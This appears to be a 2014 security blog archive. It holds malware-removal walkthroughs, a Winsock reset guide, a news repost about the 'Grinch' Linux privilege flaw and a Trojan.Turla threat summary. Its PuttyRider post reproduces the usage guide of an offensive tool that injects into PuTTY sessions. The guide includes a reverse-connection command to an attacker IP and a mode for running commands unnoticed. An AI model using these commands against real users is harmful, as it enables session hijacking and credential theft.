Wednesday, December 31, 2014

Powershell Has Stopped Working & Trojans

Powershell Has Stopped Working & Trojans
Ref: https://forums.malwarebytes.org/index.php?/topic/159960-powershell-has-stopped-working-trojans/



      
Please run a Threat Scan with Malwarebytes

Start Malwarebytes 2.0..........
Click on Settings > Detection and Protection > Non-Malware Protection > PUP (Potentially Unwanted Program) detections > Make sure it's set to Treat detections as malware
Same for PUM (Potentially Unwanted Modifications)
Quarantine all that's found
Post the log (
save the log as a .txt file not .xml)


Then......



Please download and run RogueKiller 32 bit to your desktop.

RogueKiller<---use class="apple-converted-space" for="" one="" span="" this=""> 64 bit systems




    Which system am I using?

Quit all running programs.

For Windows XP, double-click to start.
For Vista or Windows 7-8, do a right-click on the program, select Run as Administrator to start, & when prompted Allow to run.


Wait for the Prescan to finish

Click Scan to scan the system.


Don't run any other options, they're not all bad!!!!!!!

RogueKiller logs will also be located here:
%programdata%/RogueKiller/Logs <-------w7 span="">
C:\Documents and Settings\All Users\Application Data\RogueKiller\Logs <-------xp o:p="">
________________________________________________________________________________




Download the attached fixlist.txt to the same folder as FRST.exe/FRST64.exe.

Run FRST.exe/FRST64.exe and click Fix only once and wait


The tool will create a log (Fixlog.txt) in the folder, please post it to your reply. 







Then...........



Please download and run ComboFix.

The most important things to remember when running it is to disable all your malware programs and run Combofix from your desktop.









Please visit this webpage for download links, and instructions for running ComboFix

http://www.bleepingc...to-use-combofix

http://www.bleepingc...combofix/dl/12/ 



Please make sure you click download buttons that look similar to this, not "sponsored ad links":





Ensure you have disabled all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Information on disabling your malware programs can be found Here.

Make sure you run ComboFix from your desktop.

Give it at least 30-45 minutes to finish if needed.

Please include the C:\ComboFix.txt in your next reply for further review.


----------NOTE<---------- font="" nbsp="">
If you get the message Illegal operation attempted on registry key that has been marked for deletion after you run ComboFix....please reboot the computer, this should resolve the problem. You may have to do this several times if needed.

________________________________________________________________________________
Lets check your computers security before you go and we have a little cleanup to do also:

 Download Security Check by screen317 from HERE or HERE.


     ·         
          Save it to your Desktop.
·         Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
·         If you get Unsupported operating system. Aborting now, just reboot and try again.

·         A Notepad document should open automatically called checkup.txt.


_______________________________________________________________________________
A little clean up to do....

Please Uninstall ComboFix: (------->if you used it<------- span="">)

Press the Windows logo key + R to bring up the "run box"

Copy and paste next command in the field:

ComboFix /uninstall

Make sure there's a space between Combofix and /















Then hit enter. (it may look like CF is re-installing but it's not)
This will uninstall Combofix, delete its related folders and files, hide file extensions, hide the system/hidden files and clears System Restore cache and create new Restore point

(If that doesn't work.....you can simply rename ComboFix.exe to Uninstall.exe and double click it to complete the uninstall or download and run the uninstaller)

---------------------------------




Download Delfix from here and save it to your desktop. (you may already have this)

·         Ensure Remove disinfection tools is checked.
·         Click the Run button.
·         Reboot
Any other programs or logs that are still remaining, you can manually delete. (right click.....Delete)
IE: RogueKiller.exe, RKreport.txt, RK_Quarantine folder, C:\FRST folder, FRST-OlderVersion folder, MBAR folder, etc....AdwCleaner > just run the program and click uninstall.

Note:
If you used FRST and can't delete the quarantine folder:
Download the fixlist.txt to the same folder as FRST.exe.
Run FRST.exe and click Fix only once and wait
That will delete the quarantine folder created by FRST.
The rest you can manually delete.




CMI Limited - Remove this Junk

Well last day of the year and out with a bang, saw a system with a ton of rogue applications installed, one being:

Tuesday, December 30, 2014

Fix Winsock

Winsock Fix for Windows Computers

After removing spyware or malware, if you have problems connecting to the Internet, you may need to initialize your TCP/IP network settings. To restore your connection, follow the directions below for the type of Windows computer you use.

Windows 7 computers

Click Start in the lower-left corner of the screen.
Click in the Start Search box and type the following command:

cmd

When cmd.exe appears in the Programs box, right-click it and select Run as administrator as shown in the following graphic:







































Click Continue if the User Account Control dialog box prompts you whether to run this program.

In the window that appears, type the following command:

netsh winsock reset

The window should look similar to the following:






















Press ENTER.
Restart your computer.

Wednesday, December 17, 2014

The Grinch


















http://www.techworm.net/2014/12/linux-grinch-vulnerability.html#prettyPhoto

All Linux Platforms are vulnerable to the ‘Grinch’ Root Access vulnerability

Security researchers at Alert Logic have unearthed a vulnerability in Linux  platforms that could potentially affect every system even remotely using Linux including Android smartphones and tablets. This vulnerability dubbed “Grinch” could potentially allow a user to get root access of a system thereby bypassing all security mechanisms leaving the target machine utterly defenseless. This flaw can be used across Linux powered computers, servers and even android devices. Alert Logic states,

According to a 2013 report from W3Tech, approximately 65% of all web servers on the Internet utilize a Unix/Linux based operating system. We uncovered a bug that impacts all Linux platforms, including mobile devices, and we’re calling it “grinch.” Fortunately, there are ways to detect the exploit of this bug in your environment until a patch is released.

Exploitation of the logging system

Grinch Root Access Vulnerability Impacts All Linux PlatformsThis isn’t the first major vulnerability to be uncovered in Linux. The same researchers had uncovered vulnerabilities in JournalD back in August, 2014, which allowed attackers to hijack the terminal sessions for remote execute commands. Further digging led them to grinch. The vulnerability was found in a Linux authorization system which could give an unauthorized user root access to the system by leveraging “wheel,” a special user group that controls access to the su command and allows one user to operate as if they were another.  Writing on the Alert Logic blog, Chief Security Evangelist, Stephen Coty stated,

“If we were to compromise the user through a client-side vulnerability or any privilege escalation on the box itself, we would no longer need to worry about cached Sudo authorization timestamp tokens or trying to trick users into providing their credentials with bashrc, environment modifications, or other means,” the researchers explained. “Instead, we can abuse the user’s group privileges to give us access, thus granting direct authentication bypass even if the wheel user cannot get root like in Ubuntu ecosystems.”

A potential hacker could exploit the Grinch flaw by either modifying the registered user accounts in a wheel or by manipulating the Policy Kit (Polkit), a graphical User interface for managing privileged operations for ordinary users.

“Polkit can be used by privileged processes to decide if it should execute privileged operations on behalf of the requesting user. For directly executed tools, Polkit provides a setuid-root helper program called ‘’pkexec.’’ The hooks to ask the user for authorizations are well integrated into text environments and native in all major graphical environments” notes Alert Logic in a blog.”

Whichever method the attacker uses, the goal is to gain root access to the system. With root access, the attacker has full administrative control and can install, modify programs or access files in any directory. The attacker is also able to remotely control the system implying they can create a replicating worm which can be spread to other systems instantaneously.

Threat perception

With an approximate 65% of web servers running on Linux/Unix the threat of this vulnerability cannot be emphasized enough. Major companies which run their services on Linux based system will be affected include the cloud servers of Amazon and Microsoft. Not to mention the half a billion users of Android around the world who stand in risk. “We find that possession of user logs and knowledge of your own environment are the best security content to help you navigate away from a bug like grinch,” the team advised. “Know how your Linux administrator is installing packages and managing updates.”

On the bright side, the researchers also denied any news of this vulnerability ever being used so far. So no major damage has been done. It is advised to restrict user permissions on your Linux systems and also monitor user activity until a proper patch is released.

On the vulnerability level, Grinch could be to Linux what ShellShock is to Windows.  Until and unless a patch is released all the devices running on Linux are vulnerable to Grinch.  Linux team is yet to confirm the Alert Logic’s finding or issue a patch for this vulnerability but Coty believed that Linux was working on this issue.

How Public Is Your Private Information

Thursday, December 11, 2014

PuttyRider


PuttyRider is a tool for performing dll injection of Putty and allows an attacker to inject Linux commands.
REF: https://github.com/seastorm/PuttyRider














PuttyRider
Hijack Putty sessions in order to sniff conversation and inject Linux commands.

Download
PuttyRider-bin.zip

Documentation
Defcamp 2014 presentation - pdf
Defcamp 2014 presentation - video

Examples:
List existing Putty processes and their status (injected / not injected)

  • PuttyRider.exe -l


Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

  • PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

  • PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

  • PuttyRider.exe -x

Usage:
Operation modes:
    -l      List the running Putty processes and their connections

    -w      Inject in all existing Putty sessions and wait for new sessions
            to inject in those also

    -p PID  Inject only in existing Putty session identified by PID.
            If PID==0, inject in the first Putty found

    -x      Cleanup. Remove the DLL from all running Putty instances

    -d      Debug mode. Only works with -p mode

    -c CMD  Automatically execute a Linux command after successful injection
            PuttyRider will remove trailing spaces and '&' character from CMD
            PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD

    -h      Print this help

Output modes:
    -f          Write all Putty conversation to a file in the local directory.
                The filename will have the PID of current putty.exe appended

    -r IP:PORT  Initiate a reverse connection to the specified machine and
                start an interactive session.

Interactive commands (after you receive a reverse connection):
    !status     See if the Putty window is connected to user input

    !discon     Disconnect the main Putty window so it won't display anything
                    This is useful to send commands without the user to notice

    !recon      Reconnect the Putty window to its normal operation mode

    CMD       Linux shell commands

    !exit        Terminate this connection

    !help       Display help for client connection

Compiling:
Use Visual Studio Command Prompt:

  • nmake main dll


Acknowledgements
Thanks to Brett Moore of Insomnia Security for his proof of concept PuttyHijack

Tuesday, December 9, 2014

Turla Epic Snake


Trojan.Turla














Risk Level 1: Very Low
Discovered: January 13, 2014
Updated: August 8, 2014 10:55:40 AM
Type: Trojan

Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

Trojan.Turla is a Trojan horse that may open a back door and steal information on the compromised computer.

Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Medium
Payload: Opens a back door.
Releases Confidential Info: Steals information and sends it back to a remote server.
Distribution
Distribution Level: Low